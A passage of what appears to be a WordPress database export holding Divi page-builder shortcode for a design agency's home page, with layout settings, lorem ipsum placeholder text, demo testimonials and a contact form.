animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:00:57','2020-07-02 21:00:57','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(161,1,'2020-07-02 21:11:40','2020-07-02 21:11:40','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" background_enable_image=\"off\" parallax=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_letter_spacing=\"3px\" custom_margin=\"||45px|\" animation_style=\"slide\" animation_direction=\"bottom\" hover_enabled=\"0\" locked=\"off\"]<p style=\"text-align: center;\">We are a full service</p>\n[/et_pb_text][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1 style=\"text-align: center;\">Creative<br /> <span style=\"color: #353740;\">Design Agency</span></h1>\n[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]<p style=\"text-align: center;\">It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.</p>[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" 